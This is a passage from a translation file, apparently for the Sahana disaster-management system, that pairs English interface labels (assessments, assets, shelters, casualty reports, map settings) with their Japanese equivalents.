'Alternative infant nutrition in use': '利用中の乳児用代替食',
'Alternative places for studying available': '学校以外の場所を学習に利用可能である',
'Alternative places for studying': '授業開設に利用可能な施設',
'Ambulance Service': '救急サービス',
'An Inventory Store is a physical place which contains Relief Items available to be Distributed.': '物資集積場所とは、救援物資の配給能力をもつ、物理的な場所を指します。',
'An intake system, a warehouse management system, commodity tracking, supply chain management, procurement and other asset and resource management capabilities.': '物資の受け入れ、貯蔵設備の管理、必要な物資の記録、サプライチェーン・マネジメント、調達、その他様々な資産やリソースの管理といった機能。',
'An item which can be used in place of another item': '他の物資の代わりに使う物資',
'Analysis of Completed Surveys': '完了したフィードバックの分析',
'Animal Die Off': '動物の死',
'Animal Feed': '動物のエサ',
'Animals': '動物',
'Answer Choices (One Per Line)': '選択肢(一行に一つ)',
'Anthropology': '人類学',
'Antibiotics available': '抗生物質が利用可能',
'Antibiotics needed per 24h': '24時間ごとに必要な抗生物質',
'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'ファイル内の利用可能なすべてのメタデータ(タイムスタンプ、作成者、緯度経度等)を自動的に読み込みます。',
'Any comments about this sync partner.': 'データの同期先に関するコメント',
'Apparent Age': '年齢(外見)',
'Apparent Gender': '性別(外見)',
'Application Permissions': 'アプリケーションに対する権限',
'Application': '申請',
'Applications': 'アプリケーション',
'Appropriate clothing available': '適切な衣料が利用可能である',
'Appropriate cooking equipment/materials in HH': '世帯内にて適切な調理器具/食材が利用可能である',
'Approved': '承認されました',
'Approver': '承認者',
'Approx. number of cases/48h': '事象の発生概数/48h',
'Approximately how many children under 5 with diarrhea in the past 48 hours?': '過去48時間以内に発生した、5歳未満小児の下痢症状発生件数を記載してください。概数でかまいません',
'Archive not Delete': 'Archiveを削除しない',
'Arctic Outflow': '北極気団の南下',
'Are basic medical supplies available for health services since the disaster?': '災害発生後、基本的な医療行為を行えるよう、ヘルスサービスに対して供給があったかどうかを記載します',
'Are breast milk substitutes being used here since the disaster?': '災害発生後、母乳代替品が使われているかどうかを記載します',
'Are the areas that children, older people, and people with disabilities live in, play in and walk through on a daily basis physically safe?': '日中時間帯、この地域での生活や遊び、通行によって、未成年や高齢者、障碍者に肉体的な危害が及ぶ可能性があるかを記載します',
'Are the chronically ill receiving sufficient care and assistance?': '慢性病の罹患者に対して、十分なケアと介護が行われているかを記載します',
'Are there adults living in prisons in this area?': 'この地域で刑務所に収容されている成人がいるかどうかを記載してください',
'Are there alternative places for studying?': '学校以外に学習を行える場所があるかどうかを記載してください',
'Are there cases of diarrhea among children under the age of 5?': '5歳未満の幼児に下痢症状が発生しているかどうかを記載してください',
'Are there children living in adult prisons in this area?': 'この地域で、成人用刑務所に収容されている未成年がいるかどうかを記載してください',
'Are there children living in boarding schools in this area?': 'この地域で、寄宿舎に居住している未成年がいるかどうかを記載してください',
'Are there children living in homes for disabled children in this area?': 'この地域で、障がいのある子供の世話をするために家にいる未成年がいるかどうかを記載してください',
'Are there children living in juvenile detention in this area?': 'この地域で、少年院に収容されている未成年がいるかどうかを記載してください',
'Are there children living in orphanages in this area?': 'この地域で、孤児となった子供は居ますか?',
'Are there children with chronical illnesses in your community?': '慢性疾患をもった子どもが共同体の中にいるかどうかを記載してください',
'Are there health services functioning for the community since the disaster?': '災害発生後、共同体で医療サービスが機能しているかどうかを記載してください',
'Are there older people living in care homes in this area?': 'この地域で、介護施設に居住している高齢者がいるかどうかを記載してください',
'Are there older people with chronical illnesses in your community?': 'この共同体のなかで、慢性疾患を患っている高齢者がいるかどうかを記載してください',
'Are there people with chronical illnesses in your community?': 'この共同体の中で、慢性疾患を患っている人物がいるかどうかを記載してください',
'Are there separate latrines for women and men available?': 'トイレが男女別になっているかどうかを記載してください',
'Are there staff present and caring for the residents in these institutions?': 'これら施設の居住者に対して、ケアと介護を行えるスタッフが存在するかどうかを記載してください',
'Area': 'エリア',
'Areas inspected': '調査済み地域',
'Assessment Details': 'アセスメントの詳細',
'Assessment Reported': 'アセスメントを報告しました',
'Assessment Summaries': 'アセスメントの要約',
'Assessment Summary Details': 'アセスメント要約の詳細',
'Assessment Summary added': 'アセスメントの要約を追加しました',
'Assessment Summary deleted': 'アセスメントの要約を削除しました',
'Assessment Summary updated': 'アセスメントの要約を更新しました',
'Assessment Type': 'アセスメントタイプ',
'Assessment added': 'アセスメントを追加しました',
'Assessment admin level': 'アセスメントの管理レベル',
'Assessment and Activities Gap Analysis Map': 'アセスメントと活動のギャップについての解析マップ',
'Assessment and Activities Gap Analysis Report': 'アセスメントと支援活動のギャップ解析レポート',
'Assessment deleted': 'アセスメントを削除しました',
'Assessment timeline': 'アセスメントタイムライン',
'Assessment updated': 'アセスメントを更新しました',
'Assessment': 'アセスメント',
'Assessments Needs vs. Activities': '需要アセスメントと支援活動のギャップ',
'Assessments and Activities': 'アセスメントと支援活動',
'Assessments are shown as green, yellow, orange, red.': 'アセスメントは、緑・黄・オレンジ・赤のいずれかの色で表されます。',
'Assessments are structured reports done by Professional Organizations - data includes WFP Assessments': 'アセスメントとは、専門団体によって作成された調査文書のことを指します。データには、WFP(国連世界食糧計画)アセスメントも含まれます',
'Assessments are structured reports done by Professional Organizations': 'アセスメントとは、専門団体によって作成された調査文書のことを指します。',
'Assessments': 'アセスメント',
'Assessments:': 'アセスメント:',
'Assessor': '査定実施者',
'Asset Assigned': '資産割り当て',
'Asset Assignment Details': '資産割り当ての詳細',
'Asset Assignments deleted': '資産の割り当てを削除しました',
'Asset Assignments updated': '物資割り当てを更新しました',
'Asset Assignments': '資産割り当て',
'Asset Details': '資産の詳細',
'Asset Management': '資産管理',
'Asset Number': '資産番号',
'Asset added': '資産を追加しました',
'Asset deleted': '資産を削除しました',
'Asset updated': '資産を更新しました',
'Asset': '資産',
'Assets': '資産',
'Assign Asset': '資産割り当て',
'Assign Storage Location': '蓄積地点の割り当て',
'Assign to Org.': '組織に割り当て',
'Assigned To': '担当者',
'Assigned to': '担当者',
'Assigned': '割り当てられた',
'Assignments': '割り当て',
'Assistance for immediate repair/reconstruction of houses': '緊急の修理/家屋復旧の手伝い',
'Assistant': 'アシスタント',
'At/Visited Location (not virtual)': '実際に訪問した/訪問中のロケーション',
'Attend to information sources as described in <instruction>': '<instruction>に記載されている情報ソースへの参加',
'Attribution': '属性',
'Audit Read': '監査報告書の読み込み',
'Audit Write': '監査報告書の書き込み',
'Author': '作者',
'Automotive': '車両',
'Availability': 'ボランティア期間',
'Available Alternative Inventory Items': '利用可能な他の物資',
'Available Beds': '利用可能なベッド数',
'Available Inventory Items': '利用可能な倉庫内の物資',
'Available Messages': '利用可能なメッセージ',
'Available Records': '利用可能なレコード',
'Available databases and tables': '利用可能なデータベースおよびテーブル',
'Available for Location': '活動可能な地域',
'Available from': 'ボランティア開始日',
'Available in Viewer?': 'ビューワ内で利用可能?',
'Available until': 'ボランティア終了日',
'Availablity': '活動期間',
'Avalanche': '雪崩',
'Avoid the subject event as per the <instruction>': '<instruction>に従って対象の事象を避ける',
'Babies who are not being breastfed, what are they being fed on?': '乳児に対して母乳が与えられない場合、どうやって乳幼児の食事を確保しますか?',
'Baby And Child Care': '乳幼児へのケア',
'Background Color for Text blocks': 'テキストブロックの背景色',
'Background Color': '背景色',
'Bahai': 'バハイ',
'Baldness': '禿部',
'Balochi': 'バロチ語',
'Banana': 'バナナ',
'Bank/micro finance': '銀行/マイクロファイナンス',
'Barricades are needed': 'バリケードが必要',
'Base Layer?': '基本レイヤ?',
'Base Layers': '基本レイヤ',
'Base Location': '基本となるロケーション',
'Base Unit': '基本単位',
'Baseline Number of Beds': '平常時のベッド設置数',
'Baseline Type Details': '基準値タイプの詳細',
'Baseline Type added': '基準値タイプを追加しました',
'Baseline Type deleted': '基準値のタイプを削除しました',
'Baseline Type updated': '基準値タイプを更新しました',
'Baseline Type': '基準値タイプ',
'Baseline Types': '基準値の種類',
'Baseline added': '基準値を追加しました',
'Baseline deleted': '基準値を削除しました',
'Baseline number of beds of that type in this unit.': 'この施設における、通常状態のベッド収容数です。',
'Baseline updated': '基準値を更新しました',
'Baselines Details': '基準値の詳細',
'Baselines': '基準値',
'Basic Assess.': '基本アセスメント',
'Basic Assessment Reported': 'ベーシック・アセスメントを報告しました',
'Basic Assessment': '基本アセスメント',
'Basic Details': '基本情報',
'Basic information on the requests and donations, such as category, the units, contact details and the status.': '支援要請と寄付に関する基本情報です。カテゴリ、単位、連絡先詳細および状態等が記載されています。',
'Basic medical supplies available prior to disaster': '災害発生以前 基本的な医療行為の提供',
'Basic medical supplies available since disaster': '災害発生後 基本的な医療行為の提供',
'Basic reports on the Shelter and drill-down by region': '避難所の基本レポートと、地域による絞り込み',
'Basic': '基本',
'Baud rate to use for your modem - The default is safe for most cases': 'モデムを使用するためのボーレートです。大抵の場合はデフォルトが安全です。',
'Baud': 'ボー値',
'Beam': '梁',
'Bed Capacity per Unit': '施設ごとのベッド最大収容数',
'Bed Capacity': 'ベッド最大収容数',
'Bed Type': 'ベッド種別',
'Bed type already registered': 'ベッドのタイプは既に登録済みです。',
'Bedding materials available': '寝具が利用可能である',
'Below ground level': '地下',
'Beneficiary Type': '受益者タイプ',
'Biological Hazard': '生物災害',
'Biscuits': 'ビスケット',
'Blizzard': '吹雪',
'Blood Type (AB0)': '血液型 (AB0式)',
'Blowing Snow': '地吹雪',
'Boat': 'ボート',
'Bodies found': '未回収の遺体',
'Bodies recovered': '回収済みの遺体',
'Body Recovery Reports': '遺体回収レポート',
'Body Recovery Request': '遺体回収の要請',
'Body Recovery Requests': '遺体回収の要請',
'Body': '本文',
'Bomb Explosion': '爆発が発生',
'Bomb Threat': '爆発の危険性',
'Bomb': '爆発物',
'Border Color for Text blocks': 'テキストブロックの枠色',
'Bounding Box Insets': '領域を指定した枠組みへ差し込む',
'Bounding Box Size': '領域を指定した枠組みのサイズ',
'Boys 13-18 yrs in affected area': '影響地域内の13-18歳の男子数',
'Boys 13-18 yrs not attending school': '学校に来ていなかった13-18歳の男子数',
'Boys 6-12 yrs in affected area': '影響地域内の6-12歳の男子数',
'Boys 6-12 yrs not attending school': '学校に来ていなかった6-12歳の男子数',
'Brand Details': '銘柄の詳細',
'Brand added': '銘柄を追加しました',
'Brand deleted': '銘柄が削除されました',
'Brand updated': '銘柄が更新されました',
'Brand': '銘柄',
'Brands': '銘柄',
'Breast milk substitutes in use since disaster': '災害発生後から母乳代替品を使用している',
'Breast milk substitutes used prior to disaster': '災害前から母乳代替品を使用していた',
'Bricks': 'レンガ',
'Bridge Closed': '橋梁(通行止め)',
'Bucket': 'バケツ',
'Buddhist': '仏教徒',
'Budget Details': '予算の詳細',
'Budget Updated': '予算を更新しました',
'Budget added': '予算を追加しました',
'Budget deleted': '予算を削除しました',
'Budget updated': '予算を更新しました',
'Budget': '予算',
'Budgeting Module': '予算編成モジュール',
'Budgets': '予算編成',
'Buffer': 'バッファ',
'Bug': 'バグ',
'Building Aide': '建設援助',
'Building Assessment': '建物のアセスメント',
'Building Assessments': '建築物アセスメント',
'Building Collapsed': '崩壊した建物',
'Building Name': '建物名',
'Building Safety Assessments': '建物の安全アセスメント',
'Building Short Name/Business Name': '建物の名前 / 会社名',
'Building or storey leaning': '建物または階層が傾いている',
'Built using the Template agreed by a group of NGOs working together as the': '例えばECB等、多くのNGOによって利用されている形式を使っての記録が可能です。',
'Bulk Uploader': 'まとめてアップロード',
'Bundle Contents': '小包の内容',
'Bundle Details': 'Bundleの詳細',
'Bundle Updated': 'バンドルを更新しました',
'Bundle added': 'バンドルを追加しました',
'Bundle deleted': 'バンドルを削除しました',
'Bundle updated': 'バンドル・セットを更新しました',
'Bundle': 'バンドル',
'Bundles': 'バンドル',
'Burn ICU': '熱傷 ICU',
'Burn': '火傷(やけど)',
'Burned/charred': '火傷/炭化',
'Business damaged': 'ビジネスへの損害が発生している',
'By Inventory': '物資の送付元',
'By Person': '人物ごと',
'By Site': 'サイト別',
'By Warehouse': '送付元倉庫',
'CBA Women': 'CBA 女性',
'CN': '貨物運送状',
'CSS file %s not writable - unable to apply theme!': 'CSS ファイル %s が書き込み不可になっているため、テーマを適用することができません。',
'Calculate': '計算',
'Camp Coordination/Management': '仮泊施設間の調整 / 管理',
'Camp': '仮泊施設',
'Can only disable 1 record at a time!': '一度に1つしか無効にできません!',
'Can users register themselves for authenticated login access?': '新規ユーザが、他者の承認なしに自分を新規ユーザとして登録できるか?',
'Cancel Add': '追加を取り消す',
'Cancel Shipment': '輸送をキャンセルする',
'Cancel': 'キャンセル',
'Canceled': 'キャンセル',
'Candidate Matches for Body %s': 'Bodyに適合した候補者は %s',
'Canned Fish': '魚の缶詰',
'Cannot be empty': '必ず入力してください。',
'Cannot delete whilst there are linked records. Please delete linked records first.': 'リンクされたレコードがあるので削除できません。このレコードよりも先に、リンク先のレコードを削除してください。',
'Cannot disable your own account!': '自分自身のアカウントを無効にする事はできません',
'Capacity (Max Persons)': '収容可能数 (最大人数)',
'Capacity (W x D X H)': '収容可能面積 (W x D X H)',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': '被災者の個々のグループについて、情報を取得する (ツアー旅行者、滞在者、家族、など)',
'Capture Information on each disaster victim': '被災者情報を個別に把握する',
'Capturing organizational information of a relief organization and all the projects they have in the region': '個々の支援団体と、地域内で実行中の全てのプロジェクトを取得します',
'Capturing the essential services each Volunteer is providing and where': '各ボランティアの居場所と、提供している主要なサービスを取得する',
'Capturing the projects each organization is providing and where': '各団体の所在地と、提供している主要なサービスを取得します',
'Cardiology': '心臓病学',
'Cash available to restart business': '事業再開に必要な資金調達が可能',
'Cassava': 'キャッサバ',
'Casual Labor': '一般労働',
'Casualties': '犠牲者',
'Catalog Item added': '救援物資カタログにアイテムを追加しました',
'Catalog Item deleted': 'カタログアイテムを削除しました',
'Catalog Item updated': '救援物資カタログを更新しました',
'Catalog Item': '救援物資カタログ',
'Catalog Items': '物資カタログ',
'Catalog Name': 'カタログ名',
'Catalog': 'カタログ',
'Category': 'カテゴリ',
'Category<>Sub-Category<>Catalog Relation added': 'Category<>Sub-Category<>Catalog 間の関係を追加しました',
'Category<>Sub-Category<>Catalog Relation deleted': 'Category<>Sub-Category<>Catalog 関係を削除しました',
'Category<>Sub-Category<>Catalog Relation updated': 'Category<>Sub-Category<>Catalog 間の関係を更新しました',
'Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 間の関係',
'Ceilings, light fixtures': '天井、照明あり',
'Central point to record details on People': '被災者や支援者など、関係者情報の集積を行ないます',
'Certificate Status': '認証状態',
'Certification': '有資格者',
'Change Password': 'パスワードの変更',
'Check for errors in the URL, maybe the address was mistyped.': '入力したURLに間違いがないか確認してください。',
'Check if the URL is pointing to a directory instead of a webpage.': 'URLがウェブページではなくディレクトリを指定しているか、確認してください。',
'Check outbox for the message status': '送信箱を調べてメッセージステータスを確認する',
'Check to delete': '削除項目にチェック',
'Check to delete:': '削除項目にチェック:',
'Check': '確認',
'Check-In': 'チェックイン',
'Check-Out': 'チェックアウト',
'Check-in': 'チェックイン',
'Check-out': 'チェックアウト',
'Checklist created': 'チェックリストを作成しました',
'Checklist deleted': 'チェックリストを削除しました',
'Checklist of Operations': '作業項目チェックリスト',
'Checklist updated': 'チェックリストを更新しました',
'Checklist': 'チェックリスト',
'Chemical Hazard': '化学災害',
'Chemical, Biological, Radiological, Nuclear or High-Yield Explosive threat or attack': '兵器による攻撃、脅威(化学兵器、生物兵器、放射能汚染、核兵器、高威力の爆発)',
'Chicken': 'ニワトリ',
'Child (2-11)': '子供 (2-11歳)',
'Child (< 18 yrs)': '子供 (18歳未満)',
'Child Abduction Emergency': '未成年誘拐警報',
'Child headed households (<18 yrs)': '代表者が未成年 (18歳以下)の世帯数',
'Child': '子供',
'Children (2-5 years)': '子供たち (2-5歳)',
'Children (5-15 years)': '子供たち(5-15歳)',
'Children (< 2 years)': '子供たち (2歳未満)',
'Children in adult prisons': '成人用刑務所に未成年がいる',
'Children in boarding schools': '寄宿制学校の児童がいる',
'Children in homes for disabled children': '障がい児施設にいる子ども',
'Children in juvenile detention': '少年院収容者がいる',
'Children in orphanages': '身寄りの無い人がいる',
'Children living on their own (without adults)': '未成年のみで自活(成人無し)',
'Children not enrolled in new school': '新しい学校に入学していない子供',
'Children orphaned by the disaster': '被災のため孤児になった子供たち',
'Children separated from their parents/caregivers': '親(または親相当の後見人)とはぐれた子供の数',
'Children that have been sent to safe places': '安全な地域へ疎開済みの子供数',
'Children who have disappeared since the disaster': '災害発生後に行方不明の子供たち',
'Children with chronical illnesses': '慢性疾患をもつ子供がいる',
'Chinese (Taiwan)': '中国語 (台湾繁体字)',
'Cholera Treatment Capability': 'コレラ治療対応能力',
'Cholera Treatment Center': 'コレラ治療センター',
'Cholera Treatment': 'コレラの治療',
'Cholera-Treatment-Center': 'コレラ治療センター',
'Choose a new posting based on the new evaluation and team judgement. Severe conditions affecting the whole building are grounds for an UNSAFE posting. Localised Severe and overall Moderate conditions may require a RESTRICTED USE. Place INSPECTED placard at main entrance. Post all other placards at every significant entrance.': '新規の評価とチームの判定に基づいた新しいポスターを選択してください。建物全体が深刻な状態の場合「危険」を、一部は使える場合「制限あり」です。主要な出入口に「調査済み」プラカードを設置してください。全ての使用可能な出入口には他のプラカードを設置してください。',
'Choose': '選択',
'Choosing Skill and Resources of Volunteers': 'ボランティアのスキルとリソースを選択してください',
'Christian': 'キリスト教徒',
'Church': '教会',
'Circumstances of disappearance, other victims/witnesses who last saw the missing person alive.': '行方不明時の状況や、この人物の生存を最後に確認した人物についての情報を記載してください。',
'Civil Emergency': '市民緊急事態',
'Cladding, glazing': '被覆・外壁、ガラス板',
'Clear Selection': '選択をクリア',
'Click on the link %(url)s to reset your password': 'リンクをクリックしてください %(url)s パスワードのリセット',
'Click on the link %(url)s to verify your email': 'リンクをクリックしてください %(url)s 登録されたメールアドレスに間違いが無いことが確認されます',
'Client IP': 'クライアントIP',
'Clinical Laboratory': '臨床検査',
'Clinical Operations': '診療の人員数',
'Clinical Status': '診療状況',
'Close map': '地図を閉じる',
'Closed': '閉鎖中',
'Closure': '閉鎖・通行止め',
'Clothing': '衣服',
'Cluster Details': 'クラスタの詳細',
'Cluster Distance': 'クラスタ距離',
'Cluster Subsector Details': 'クラスタのサブクラスタの詳細',
'Cluster Subsector added': 'クラスタのサブセクタを追加しました',
'Cluster Subsector deleted': 'クラスタのサブセクタを削除しました',
'Cluster Subsector updated': 'クラスタのサブセクタを更新しました',
'Cluster Subsector': 'クラスタのサブクラスタ',
'Cluster Subsectors': 'クラスタのサブセクタ',
'Cluster Threshold': 'クラスタのしきい値',
'Cluster added': 'クラスタを追加しました',
'Cluster deleted': 'クラスタを削除しました',
'Cluster updated': 'クラスタを更新しました',
'Cluster': 'クラスタ',
'Cluster(s)': 'クラスタ',
'Clusters': 'クラスタ',
'Code': 'プロジェクトコード',
'Cold Wave': '寒波',
'Collapse, partial collapse, off foundation': '全壊、一部損壊、off foundation',
'Collective center': '収集センター',
'Color for Underline of Subheadings': 'サブヘッダのアンダーラインの色',
'Color of Buttons when hovering': 'ホバー時のボタンの色',
'Color of bottom of Buttons when not pressed': '押されなかった時のボタンの下部の色',
'Color of bottom of Buttons when pressed': 'ボタン押下時の下部の色',
'Color of dropdown menus': 'ドロップダウンメニューの色',
'Color of selected Input fields': '選択中の入力フィールドの色',
'Color of selected menu items': '選択中のメニューアイテムの色',
'Column Choices (One Per Line': 'カラム選択 (一行に一つ',
'Columns, pilasters, corbels': '円柱、付け柱、コーベル',
'Combined Method': '複数証跡の組み合わせ',
'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': '復旧まで少々お待ちください。あなた以外の閲覧者にも、この表示がされています。',
'Come back later.': '復旧まで少々お待ちください',
'Comments': 'コメント',
'Commercial/Offices': '商業 / オフィス',
'Commit Date': '受け入れ日',
'Commit from %s': '%sからのコミット',
'Commit': 'コミット',
'Commit Status': '支援の引き受け状況',
'Commiting a changed spreadsheet to the database': '変更後のスプレッドシートをデータベースに反映します',
'Commitment Added': 'コミットメントを追加しました',
'Commitment Canceled': 'コミットをキャンセルしました',
'Commitment Details': 'コミットの詳細',
'Commitment Item Details': 'コミットされた救援物資の詳細',
'Commitment Item added': 'コミットの物資を追加しました',
'Commitment Item deleted': 'コミットされた救援物資を削除しました',
'Commitment Item updated': 'コミット物資を更新しました',
'Commitment Item': '物資のコミットメント',
'Commitment Items': 'コミットされた物資',
'Commitment Status': '支援の引き受け状況',
'Commitment Updated': 'コミットを更新しました',
'Commitment': 'コミットメント',
'Commitments': 'コミット',
'Committed By': '受け入れ団体/人',
'Committed': 'コミット済み',
'Committing Inventory': '引き受け中の倉庫',
'Communication problems': 'コミュニケーションの問題',
'Community Centre': 'コミュニティセンター',
'Community Health Center': '地域の医療センター',
'Community Member': 'コミュニティの構成員',
'Complete Unit Label for e.g. meter for m.': '単位を表すラベル。例えばメートルなら m など。',
'Complete': '完了',
'Completed': '完了',
'Complexion': '人種、肌色',
'Compose': 'メッセージ作成',
'Compromised': '易感染状態',
'Concrete frame': 'コンクリートのフレーム',
'Concrete shear wall': 'コンクリートせん断壁',
'Config added': '設定を追加しました',
'Config deleted': '設定を削除しました',
'Config updated': '設定を更新しました',
'Config': '設定',
'Configs': '設定',
'Configurations': '設定',
'Configure Run-time Settings': 'ランタイムの設定',
'Confirm Shipment Received': '配送物の受領を確認',
'Confirmed Incidents': '確認済みのインシデント',
'Confirmed': '確認済み',
'Conflict Details': 'コンフリクトの詳細',
'Conflict Resolution': 'データ競合の解決',
'Consignment Note': '出荷通知',
'Constraints Only': '制約のみ',
'Consumable': '消耗品',
'Contact Data': '連絡先データ',
'Contact Details': '連絡先の詳細',
'Contact Information Added': '連絡先情報を追加しました',
'Contact Information Deleted': '連絡先情報を削除しました',
'Contact Information Updated': '連絡先情報を更新しました',
'Contact Information': '連絡先情報',
'Contact Method': '問い合わせ方法',
'Contact Name': '連絡先名',
'Contact Person': '窓口担当者',
'Contact Phone': '連絡先電話番号',
'Contact details': '連絡先の詳細',
'Contact information added': '連絡先情報を追加しました',
'Contact information deleted': '連絡先情報を削除しました',
'Contact information updated': '連絡先情報を更新しました',
'Contact person in case of news or further questions (if different from reporting person). Include telephone number, address and email as available.': '詳細事項の質問や連絡を行なう際の連絡担当者を記載します(レポート報告者と異なる場合のみ)。電話番号、住所、電子メールなどを記載してください。',
'Contact person(s) in case of news or further questions (if different from reporting person). Include telephone number, address and email as available.': '情報伝達や追加質問を行う際の代表担当者(報告者と異なる場合のみ記載してください)。電話番号や住所、メールアドレスなどを指定できます。',
'Contact us': '問い合わせ',
'Contact': '連絡先',
'Contacts': '連絡先',
'Contents': '内容',
'Contradictory values!': '値が矛盾しています!',
'Contributor': '投稿者',
'Conversion Tool': '変換ツール',
'Cooking NFIs': '調理用器具',
'Cooking Oil': '調理油',
'Coordinate Conversion': '座標変換',
'Coping Activities': '一時対応活動',
'Copy any data from the one to be deleted into the one to keep': '削除する側の候補地から残す方の候補地へ、必要なデータを転載します。',
'Copy': 'コピー',
'Corn': 'とうもろこし',
'Cost Type': '料金種別',
'Cost per Megabyte': '1メガバイト毎に課金',
'Cost per Minute': '1分毎に課金',
'Country of Residence': '居住国',
'Country': '国',
'Create & manage Distribution groups to receive Alerts': 'アラートの送付先グループを作成・管理する',
'Create Activity Report': '支援活動レポートを追加',
'Create Activity Type': '支援活動タイプを追加',
'Create Activity': '支援活動を追加',
'Create Assessment': 'アセスメントを新規追加',
'Create Asset': '資産の追加',
'Create Bed Type': 'ベッドの種類を追加',
'Create Brand': '銘柄を追加',
'Create Budget': '予算を追加',
'Create Catalog Item': '物資カタログを追加',
'Create Catalog': 'カタログを追加',
'Create Checklist': 'チェックリストの作成',
'Create Cholera Treatment Capability Information': 'コレラ治療能力に関する情報の追加',
'Create Cluster Subsector': 'クラスタのサブセクタを追加',
'Create Cluster': 'クラスタを追加',
'Create Contact': '連絡先を追加',
'Create Dead Body Report': '遺体発見レポートを追加',
'Create Feature Layer': 'Feature Layerを追加',
'Create Group Entry': 'グループエントリの作成',
'Create Group': 'グループを追加',
'Create Hospital': '病院を新規追加',
'Create Identification Report': 'IDレポートを追加',
'Create Impact Assessment': '災害影響範囲アセスメントの作成',
'Create Import Job': 'Import Jobの作成',
'Create Incident Report': 'インシデントレポートを追加',
'Create Incident': 'インシデントを追加',
'Create Item Category': '物資カテゴリを追加',
'Create Item Pack': '救援物資パックの追加',
'Create Item': '救援物資を新規追加',
'Create Kit': 'キットを新規追加',
'Create Layer': 'レイヤを追加',
'Create Location': 'ロケーションを追加',
'Create Map Profile': '地図設定を追加',
'Create Marker': 'マーカーを追加',
'Create Member': 'メンバを追加',
'Create Mobile Impact Assessment': '災害影響範囲アセスメントをモバイル端末から作成',
'Create Office': 'オフィスを追加',
'Create Organization': '団体を追加',
'Create Personal Effects': 'Personal Effectsを追加',
'Create Project': 'プロジェクトを追加',
'Create Projection': '地図投影法を追加',
'Create Rapid Assessment': '被災地の現況アセスメントを作成',
'Create Report': 'レポートを新規追加',
'Create Request': '支援要請を作成',
'Create Resource': 'リソースを追加',
'Create River': '河川情報を追加',
'Create Role': '役割を追加',
'Create Sector': '活動分野を追加',
'Create Service Profile': 'サービスプロファイルを追加',
'Create Shelter Service': '避難所における提供サービスを追加',
'Create Shelter Type': '避難所タイプを追加',
'Create Shelter': '避難所を追加',
'Create Skill Type': 'スキルタイプを追加',
'Create Skill': 'スキルを追加',
'Create Status': '状況を追加',
'Create Task': 'タスクを追加',
'Create Theme': 'テーマを追加',
'Create User': 'ユーザを追加',
'Create Volunteer': 'ボランティアの追加',
'Create Warehouse': '倉庫を追加',
'Create a Person': '人物情報を追加',
'Create a group entry in the registry.': '登録にグループエントリを作成。',
'Create, enter, and manage surveys.': '調査の作成、入力、管理を実施',
'Creation of Surveys': '聞き取り調査の新規作成',
'Credential Details': '証明書の詳細',
'Credential added': '証明書を追加しました',
'Credential deleted': '証明書を削除しました',
'Credential updated': '証明書を更新しました',
'Credentials': '証明書',
'Crime': '犯罪',
'Criteria': '基準',
'Currency': '通貨',
'Current Group Members': '現在のグループメンバ',
'Current Identities': '現在のID',
'Current Location': '現在のロケーション',
'Current Log Entries': '現在のログエントリ',
'Current Memberships': '現在のメンバシップ',
'Current Notes': '現在選択中の追加情報',
'Current Registrations': '現在の登録',
'Current Status': '現在の状況',
'Current Team Members': '現在のチームメンバ',
'Current Twitter account': '現在のTwitterアカウント',
'Current community priorities': '現在のコミュニティの優先順位',
'Current general needs': '現在の需要',
'Current greatest needs of vulnerable groups': '現在、被災者が最も必要としている物資/サービス',
'Current health problems': '現在の健康問題',
'Current main income sources': '現在の主な収入源',
'Current major expenses': '現在の主な支出項目',
'Current number of patients': '現在の患者数',
'Current problems, categories': '現在の問題、カテゴリ',
'Current problems, details': '現在の問題の詳細',
'Current request': '現在の要求',
'Current response': '現在の対応状況',
'Current session': '現在のセッション',
'Current type of health problems, adults': '現在発生中の健康問題(成人)',
'Current type of health problems, children': '現在発生中の健康問題(小児)',
'Current type of source for drinking water': '現在の飲料水確保方法',
'Current type of source for sanitary water': '現在の生活用水確保方法',
'Custom Database Resource (e.g., anything defined as a resource in Sahana)': 'カストマイズされたデータベースのリソース (例:Sahana 内のリソースとして定義された物)',
'Customisable category of aid': 'カスタマイズ可能な支援カテゴリ',
'DC': '寄付の証明(Donation Certificate)',
'DECISION': '決定',
'DNA Profile': 'DNAプロファイル',
'DNA Profiling': 'DNAプロファイリング',
'DVI Navigator': '被災者の検索',
'Daily': '日次',
'Dam Overflow': 'ダム決壊',
'Damage': '損傷',
'Dangerous Person': '危険人物',
'Dashboard': 'ダッシュボード',
'Data import policy': 'データのインポートポリシー',
'Data uploaded': 'データがアップロードされました',
'Database': 'データベース',
'Date & Time': '日付と時刻',
'Date Avaialble': '日付あり',
'Date Available': '可能な日付',
'Date Received': '物資受領日',
'Date Requested': '要請した日',
'Date Required': '物資が必要になる日',
'Date Sent': '送付日',
'Date and Time of Goods receipt. By default shows the current time but can be modified by editing in the drop down list.': '物資を受領した日時を記録します。デフォルトでは現在の時間が入力されます。変更するには、ドロップダウンリストから選択してください。',
'Date and Time': '日付と時刻',
'Date and time this report relates to.': 'このレポートに関連する日付と時刻',
'Date of Birth': '生年月日',
'Date of Latest Information on Beneficiaries Reached': '恩恵を受ける人にたどり着いた最新の情報の日付',
'Date of Report': 'レポートの日付',
'Date': '日付',
'Date/Time of Find': '日付/発見日時',
'Date/Time of disappearance': '行方不明になった日付/時刻',
'Date/Time': '日付/時刻',
'De-duplicator': '重複解消機能',
'Dead Body Details': '遺体の詳細',
'Dead Body Reports': '遺体情報レポート',
'Dead Body': '遺体の管理',
'Dead body report added': '遺体発見レポートを追加しました',
'Dead body report deleted': '遺体報告を削除しました',
'Dead body report updated': '遺体レポートを更新しました',
'Deaths in the past 24h': '過去24時間の死者',
'Deaths/24hrs': '死亡者数/24h',
'Debug': 'デバッグ',
'Deceased': '死亡',
'Decimal Degrees': '十進角',
'Decomposed': '腐乱',
'Default Height of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': 'マップウィンドウのデフォルトの縦高。ウィンドウレイアウトでは、マップはウィンドウ全体に最大化されるので、大きな値を設定する必要はありません。',
'Default Height of the map window.': '地図ウィンドウの初期の高さ',
'Default Marker': 'デフォルトマーカー',
'Default Width of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': 'マップウィンドウのデフォルトの幅。ウィンドウレイアウトでは、マップはウィンドウ全体に最大化されるので、大きな値を設定する必要はありません。',
'Default Width of the map window.': '地図ウィンドウの幅の初期値',
'Default synchronization policy': 'データ同期ポリシーのデフォルト設定',
'Defaults updated': 'デフォルト値を更新しました',
